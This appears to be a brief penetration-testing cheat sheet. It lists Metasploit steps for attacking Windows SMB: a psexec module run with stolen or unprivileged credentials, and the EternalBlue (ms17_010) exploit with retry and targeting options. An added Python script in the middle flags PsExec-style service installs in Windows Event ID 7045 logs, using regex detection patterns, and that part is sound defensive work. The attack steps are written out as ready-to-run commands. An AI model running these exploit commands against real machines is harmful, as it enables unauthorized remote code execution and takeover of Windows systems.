
exploiting_windows_and_samba_vulnerabilities

If we have some unprivileged credentials for a Windows machine, we can attempt a psexec exploit:

search type:exploit psexec
use exploit/windows/smb/psexec
set SMBDomain <NAMEOFTHEDOMAIN>
set SMBPass <apassword>
set SMBUser <user>
run
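
On the defensive side, PsExec-style execution works by creating a Windows service on the target, which the System log records as Event ID 7045 ("A service was installed in the system"). The triage script below is an added example, not part of the original notes; the record field names, the sample events and the three heuristics are assumptions made for illustration.

```python
import re

# Constructed sample records (not from the page): Event ID 7045 fields as a
# log pipeline might export them. The field names are assumed.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "Spooler Helper",
     "ImagePath": r"C:\Program Files\Vendor\helper.exe"},
    {"EventID": 7045, "Computer": "WS02", "ServiceName": "kQzPxTnB",
     "ImagePath": r"%SYSTEMROOT%\hGdLmWqa.exe"},
    {"EventID": 7045, "Computer": "WS03", "ServiceName": "xYbRtLmQ",
     "ImagePath": r"%COMSPEC% /c powershell.exe -nop -w hidden"},
    {"EventID": 7036, "Computer": "WS01", "ServiceName": "BITS",
     "ImagePath": ""},
]

# Heuristics (assumptions, meant for triage rather than as signatures):
# each pairs a human-readable reason with a pattern on the service binary path.
RULES = [
    ("binary dropped directly in the Windows directory",
     re.compile(r"^(%systemroot%|[a-z]:\\windows)\\[^\\]+\.exe$", re.I)),
    ("binary launched from an ADMIN$ share path",
     re.compile(r"^\\\\[^\\]+\\admin\$\\", re.I)),
    ("command interpreter used as the service binary",
     re.compile(r"(%comspec%|\bcmd\.exe|\bpowershell(\.exe)?)", re.I)),
]

def suspicious_service_installs(events):
    """Return (computer, service name, reasons) for flagged 7045 events."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7045:      # only service-installation events
            continue
        path = ev.get("ImagePath", "").strip().strip('"')
        reasons = [label for label, rx in RULES if rx.search(path)]
        if reasons:
            findings.append((ev["Computer"], ev["ServiceName"], reasons))
    return findings

if __name__ == "__main__":
    for computer, name, reasons in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"{computer}: service {name!r} flagged: {'; '.join(reasons)}")
```

Legitimate software can trip these rules, so treat a hit as a lead to correlate with network logons to the same host, not as a verdict.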

We can also try to exploit without credentials using EternalBlue:

search type:exploit eternal
use exploit/windows/smb/ms17_010_eternalblue
set MaxExploitAttempts 9
run

If that doesn't work, we can try other advanced options, such as:

set target 0
set VerifyArch false
run